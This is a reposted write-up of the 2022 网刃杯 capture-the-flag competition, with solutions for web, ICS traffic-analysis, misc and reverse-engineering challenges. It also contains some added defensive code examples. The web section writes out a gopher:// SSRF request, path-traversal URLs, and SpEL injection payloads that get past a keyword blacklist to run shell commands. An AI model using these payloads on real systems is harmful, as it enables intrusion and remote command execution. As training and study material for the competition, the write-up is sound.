2022网刃杯-WriteUp

admin, 16 May 2022 10:16:58, CTF专场 (CTF category)

Web


Sign_in

Solution

[screenshot]


SSRF + gopher: the request only has to satisfy the checks on the server side (XFF, Referer, POST body).

gopher://172.73.23.100:80/_POST / HTTP/1.1
Host: 172.73.23.100:80
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For:127.0.0.1
Referer: bolean.club
Content-Length: 3

b=1

Convert the request to gopher format and remember to URL-encode it.
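As an added example (not part of the original write-up or the challenge code), the server-side check that would have closed this Sign_in hole: a fetch-URL validator that refuses non-HTTP schemes such as gopher:// (which lets a client speak raw TCP to the target, as used above) and refuses literal addresses in non-public ranges. The function name is_safe_fetch_url and the sample URLs are my own; hostnames that need DNS resolution are only checked syntactically here, and the assumption is that the caller re-checks the resolved address at connect time.

```python
import ipaddress
from urllib.parse import urlsplit

# Only plain HTTP(S) fetches are ever legitimate for a "visit this URL" feature.
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_fetch_url(url: str) -> tuple[bool, str]:
    """Validate a user-supplied URL before the server fetches it.

    Returns (ok, reason). Rejects:
      - schemes other than http/https (gopher://, file://, dict://, ...)
      - URLs without a host, or with userinfo (user@host tricks)
      - literal IPs that are private, loopback, link-local, reserved or multicast
    A hostname is accepted syntactically only; the resolved IP must be checked
    again right before connecting (assumption: caller does this), otherwise
    DNS rebinding bypasses this function.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "userinfo in URL"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not a literal IP: a DNS name. Safe only after resolution is re-checked.
        return True, "hostname (re-check after resolution)"
    if (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast):
        return False, f"address {ip} is not publicly routable"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs, including the challenge's gopher form.
    for u in ["gopher://172.73.23.100:80/_POST", "http://127.0.0.1/",
              "http://10.0.0.5/admin", "http://[::1]/", "http://93.184.216.34/"]:
        print(u, is_safe_fetch_url(u))
```

The check runs on the parsed URL, not on the raw string, so it is not fooled by case, whitespace or an embedded HTTP request in the path as in the payload above; the remaining gap (a public DNS name that resolves to an internal address) has to be closed at the socket layer.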

upload

Solution

There is a SQL injection in the uploaded filename.

[screenshots]

Then just query it: select flag from flag

ez_java

Solution

http://124.220.9.19:8022/download?filename=../../../web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>com.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>TestServlet</servlet-name>
        <servlet-class>com.abc.servlet.TestServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>TestServlet</servlet-name>
        <url-pattern>/test388</url-pattern>
    </servlet-mapping>

</web-app>

Read com.abc.servlet.TestServlet.class directly through the same path traversal: http://124.222.173.163:8024/download?filename=../../../classes/com/abc/servlet/TestServlet.class

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
package com.abc.servlet;

import java.io.IOException;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.expression.Expression;
import org.springframework.expression.ParserContext;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class TestServlet extends HttpServlet {
    public TestServlet() {
    }

    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        this.doPost(req, resp);
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        try {
            String name = request.getParameter("name");
            name = new String(name.getBytes("ISO8859-1"), "UTF-8");
            // The regex blacklist is the only filter between the request and SpEL.
            if (this.blackMatch(name)) {
                request.setAttribute("message", "name is invalid");
                request.getRequestDispatcher("/message.jsp").forward(request, response);
                return;
            }
            System.out.println(name);
            String message = this.getAdvanceValue(name);
            request.setAttribute("message", message);
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        } catch (Exception var5) {
            request.setAttribute("message", "error");
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        }
    }

    private boolean blackMatch(String val) {
        String[] var2 = this.getBlacklist();
        int var3 = var2.length;
        for (int var4 = 0; var4 < var3; ++var4) {
            String keyword = var2[var4];
            // 34 == Pattern.CASE_INSENSITIVE | Pattern.DOTALL
            Matcher matcher = Pattern.compile(keyword, 34).matcher(val);
            if (matcher.find()) {
                return true;
            }
        }
        return false;
    }

    private String getAdvanceValue(String val) {
        // Template mode: every #{...} segment of the user input is parsed as SpEL
        // and evaluated with a full StandardEvaluationContext (type references,
        // constructors and arbitrary method calls all allowed).
        ParserContext parserContext = new TemplateParserContext();
        SpelExpressionParser parser = new SpelExpressionParser();
        Expression exp = parser.parseExpression(val, parserContext);
        StandardEvaluationContext evaluationContext = new StandardEvaluationContext();
        return exp.getValue(evaluationContext).toString();
    }

    private String[] getBlacklist() {
        // Backslash doubled for the Java string literal; the compiled regex is exec.*\(
        return new String[]{"java.+lang", "Runtime", "exec.*\\("};
    }
}

A standard SpEL injection; the blacklist bans "java.+lang", "Runtime" and "exec.*(" (matched case-insensitively).

Going through Runtime only displays Process[pid=51, exitValue="not exited"]:

#{T(String).getClass().forName("java.l"%2b"ang.Ru"%2b"ntime").getMethod("ex"%2b"ec",T(String[])).invoke(T(String).getClass().forName("java.l"%2b"ang.Ru"%2b"ntime").getMethod("getRu"%2b"ntime").invoke(T(String).getClass().forName("java.l"%2b"ang.Ru"%2b"ntime")),new String[]{"whoami"})}

[screenshot]

Guessing it was a threading-type issue, we tried ProcessBuilder instead, which does execute, but only one line of output can be read, so base64 the command.

name=#{new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","{echo,bHMgL3xiYXNlNjQ=}|{base64,-d}|{bash,-i}"}).start().getInputStream(), "gbk")).readLine()}


[screenshots]

name=#{new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"cat","/f1AgJvav"}).start().getInputStream(), "gbk")).readLine()}

[screenshot]

flag{123awerghjvxcvcjfreawe}
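Added example, not from the write-up or the challenge: the servlet's three blacklist patterns replayed in Python with the same flags (Java's 34 = CASE_INSENSITIVE | DOTALL maps to re.IGNORECASE | re.DOTALL), to show exactly which of the inputs discussed above the filter catches and which it cannot. The function names and the sample strings are mine; the patterns are the ones from getBlacklist().

```python
import re

# The three patterns from the decompiled getBlacklist(), as raw regexes.
BLACKLIST = [r"java.+lang", r"Runtime", r"exec.*\("]
# Java Pattern.compile(keyword, 34): CASE_INSENSITIVE (2) | DOTALL (32).
FLAGS = re.IGNORECASE | re.DOTALL


def black_match(val: str) -> bool:
    """Same decision blackMatch() makes: any pattern found anywhere -> reject."""
    return any(re.search(p, val, FLAGS) for p in BLACKLIST)


# Constructed sample inputs. The first two reduce the write-up's own techniques
# to their operative substrings; the third is a harmless template.
SAMPLES = {
    "literal type reference": 'T(java.lang.Runtime)',
    "split string concatenation": '"java.l"+"ang.Ru"+"ntime"',
    "ProcessBuilder (not on the list)": 'new ProcessBuilder(new String[]{"whoami"}).start()',
    "benign template": 'hello #{1+1}',
}


def classify(samples: dict) -> dict:
    """Map each labelled sample to whether the blacklist would block it."""
    return {label: black_match(val) for label, val in samples.items()}


if __name__ == "__main__":
    for label, blocked in classify(SAMPLES).items():
        print(f"{'BLOCKED ' if blocked else 'allowed '} {label}")
```

Both bypasses the write-up uses are visible here: string concatenation keeps any forbidden token from appearing contiguously in the request, and ProcessBuilder is simply absent from the list. The patterns run over the raw parameter, but the string they are meant to block only exists after SpEL has evaluated the expression, so no regex list can close this. The fix is to stop evaluating user input under a StandardEvaluationContext: Spring's SimpleEvaluationContext (for example forReadOnlyDataBinding()) disallows type references, constructors and arbitrary method invocation, and better still, user input should not be handed to the expression parser at all.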

ICS

carefulguy

Solution

[screenshot]

Follow the TCP streams one by one; at tcp.stream eq 24 we find the field shown in the screenshot. Ignore that one; there is another part further on.

Collect the earlier data, concatenate it and hex-decode it to get the flag.

[screenshot]


xyp07

Solution

The downloaded archive is encrypted; we find

[screenshot]

a base64 string and blindly guess it is the password.

Decoding it several times gives Xyp77&7&77.

Following the TCP stream we find

[screenshot]

which is base91-encoded.

[screenshot]

Decoding it gives the flag:

welcome_S7_world_xyp07

easyice

Challenge attachment

Solution

Just follow the TCP stream and the flag is found directly.

[screenshot]

flag{e45y_1eci04}


移动的黑客 (Mobile Hacker)

Solution

After downloading, the file could not be opened. An online repair tool reported that the contents were corrupted; checking the file in a hex editor showed that the header had been altered. Changing FF FF FF FF to 0A 0D 0D 3C, taken from the headers of the other challenge captures, completed the repair.

[screenshot]

Then open the capture and, following the challenge description, find the most recent faulty packet.

The engine can accept a speed of at most 10000 rpm,

so locate the packets whose data is around 10000.

The data here is hexadecimal, so convert it to decimal: 0x2766 = 10086.

flag{data + packet number}

[screenshot]

flag{1008668156}
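An added example (not the challenge's own capture or tooling) of the scan the last few steps describe, generalised to a whole packet list: parse each hex data field, flag every setpoint above the 10000 rpm limit, pick the most recent one and build the flag the way the write-up does. The packet records are constructed; the single over-limit record reuses the value and packet number implied by the flag above, the others are made-up in-range values.

```python
# Engine limit stated in the challenge.
ENGINE_MAX_RPM = 10000

# Constructed records: (packet number, hex data field). Only the fourth one is
# taken from the write-up (0x2766 = 10086, packet 68156); the rest are filler.
SAMPLE_PACKETS = [
    (68150, "2328"),  # 9000 rpm
    (68152, "2710"),  # 10000 rpm, exactly at the limit: allowed
    (68154, "26AC"),  # 9900 rpm
    (68156, "2766"),  # 10086 rpm, over the limit
    (68158, "1F40"),  # 8000 rpm
]


def parse_setpoint(hex_field: str) -> int:
    """The data field is a hex string; convert it to a decimal rpm value."""
    return int(hex_field, 16)


def find_overspeed(packets, limit=ENGINE_MAX_RPM):
    """Return (packet_no, rpm) for every packet whose setpoint exceeds the limit."""
    hits = []
    for packet_no, hex_field in packets:
        rpm = parse_setpoint(hex_field)
        if rpm > limit:
            hits.append((packet_no, rpm))
    return hits


def latest_fault(packets, limit=ENGINE_MAX_RPM):
    """Most recent (highest packet number) out-of-range setpoint, or None."""
    hits = find_overspeed(packets, limit)
    return max(hits, key=lambda hit: hit[0]) if hits else None


def flag_from(packet_no: int, rpm: int) -> str:
    """The write-up's flag construction: flag{data + packet number}."""
    return f"flag{{{rpm}{packet_no}}}"


if __name__ == "__main__":
    fault = latest_fault(SAMPLE_PACKETS)
    print("out-of-range packets:", find_overspeed(SAMPLE_PACKETS))
    print("latest fault:", fault, "->", flag_from(*fault))
```

The same loop is what an ICS monitor would run continuously: decode the setpoint field, compare against the physical limit of the actuator and alert on the packet number and value rather than only on the protocol-level validity of the frame.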


MISC

玩坏得winxp (Broken WinXP)

Solution

The downloaded VM gives an error when opened.

A Baidu search suggests opening the .vmx file in a text editor

and adding scsi0:0.fileName = "path to the vmdk file".

On opening, it then prompts for the location of the vmdk; after selecting it

there is no error and it boots straight in.

Inside there is a folder containing the hidden file meiren.png.

Extract it with binwalk, then extract again.

The hint: the password is in the software "with a scarf" (围脖, a pun on Weibo).

[screenshot]

This yields the image f1ag.png

[screenshot]

and the archive 41Z7.ZIP.

[screenshot]

Firefox would not open, so download an XP-compatible installer and install over the top; open it and look at the bookmarks.

A QQ number is visible there; search for it and go into its Qzone.

[screenshots]

Reverse

freestyle

Solution

[screenshot]

The program logic is visible: two fun functions, and at the end it says the result is in MD5 format.

Look at the two functions.

[screenshots]

The arrows mark the core of the two functions; it is just a matter of working out the arithmetic.

The two func functions do simple arithmetic, giving 3327 and 105, and the result is MD5-hashed.

Compute the MD5 and wrap it: flag{31a364d51abd0c8304106c16779d83b1}

Re_function

Solution

NOP out the junk instructions.

[screenshots]

a = [100, 113, 84, 84, 100, 120, 116, 120, 100, 65, 64, 72, 112, 109, 24, 74,
     65, 120, 102, 114, 65, 120, 94, 78, 93, 82, 14, 61]
# Even-indexed bytes were XORed with 0x37; odd-indexed bytes are stored as-is.
out = ""
for i in range(len(a)):
    if i % 2 == 0:
        out += chr((a[i] ^ 0x37) & 0xff)
    else:
        out += chr(a[i])
print(out)
# SqcTSxCxSAwHGm/JvxQrvxiNjR9=

[screenshot]

Decode it as base64 with the program's swapped alphabet.

[screenshot]

flag{we1come_t0_wrb}
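Added example, not part of the write-up: the "swapped alphabet" step reconstructed from the two values the page gives. Because the encoded string from the XOR loop and the final flag are both on the page, the custom alphabet can be recovered by aligning standard base64 of the flag against the custom string position by position; every character maps consistently (which confirms it really is a plain table swap) and the partial table is enough to decode. The names recover_table and decode_with_table are mine.

```python
import base64
import string

# Both values are taken from the write-up above.
CUSTOM_ENCODED = "SqcTSxCxSAwHGm/JvxQrvxiNjR9="
KNOWN_PLAINTEXT = b"flag{we1come_t0_wrb}"

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def recover_table(plaintext: bytes, custom_encoded: str) -> dict:
    """Known-plaintext recovery of a base64 alphabet substitution.

    Standard base64 of the plaintext and the custom encoding have the same
    length and padding, and position i maps one custom symbol to one standard
    symbol. A position that contradicts an earlier mapping means the scheme is
    not a plain table swap, so raise rather than return a wrong table.
    """
    std = base64.b64encode(plaintext).decode()
    if len(std) != len(custom_encoded):
        raise ValueError("length mismatch: not a simple alphabet substitution")
    table = {}
    for c_std, c_custom in zip(std, custom_encoded):
        if c_std == "=" or c_custom == "=":
            if c_std != c_custom:
                raise ValueError("padding mismatch")
            continue
        if c_std not in STD_ALPHABET:
            raise ValueError(f"unexpected symbol {c_std!r}")
        seen = table.setdefault(c_custom, c_std)
        if seen != c_std:
            raise ValueError(f"conflict: {c_custom!r} -> {seen!r} and {c_std!r}")
    return table


def decode_with_table(custom_encoded: str, table: dict) -> bytes:
    """Translate custom symbols back to the standard alphabet, then b64decode.

    Raises KeyError if the input uses a symbol the recovered (partial) table
    does not cover; a longer known plaintext would be needed to fill it in.
    """
    std = "".join("=" if ch == "=" else table[ch] for ch in custom_encoded)
    return base64.b64decode(std)


if __name__ == "__main__":
    table = recover_table(KNOWN_PLAINTEXT, CUSTOM_ENCODED)
    print(f"{len(table)} of 64 alphabet entries recovered")
    print(decode_with_table(CUSTOM_ENCODED, table))
```

With only 20 bytes of known plaintext the table is partial (21 of 64 symbols), which is still enough for any other string built from those symbols; recovering the full alphabet needs either more known plaintext or reading the table out of the binary, as the write-up did.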

定时启动 (Timed Start)

Solution

[screenshot]

Running the program shows

[screenshot]

that it requires clocking in at a specified time.

[screenshot]

This gives the flag:

flag{c4c728s9ccbc87e4b5ce2f}

ez_algorithm

Solution

[screenshots]

Patch it like this.

After that, whatever you enter, it hands back the encrypted result; compare that character by character against BRUF{E6oU9Ci#J9+6nWAhwMR9n:} and, with a generous amount of reasonable guessing, the flag can be obtained without reversing the algorithm.

flag{w3Lc0mE_t0_3NcrYPti0N:}



end


Recruitment notice

ChaMd5 Venom is recruiting experienced members.

The newly formed IoT + ICS + malware sample analysis group is recruiting on an ongoing basis.

Contact: [email protected]




Originally published on the WeChat public account ChaMd5安全团队 (ChaMd5 Security Team): 2022网刃杯-WriteUp

Posted by admin on 16 May 2022 10:16:58. Reposted from CN-SEC (link retained as requested): 2022网刃杯-WriteUp http://cn-sec.com/archives/951472.html
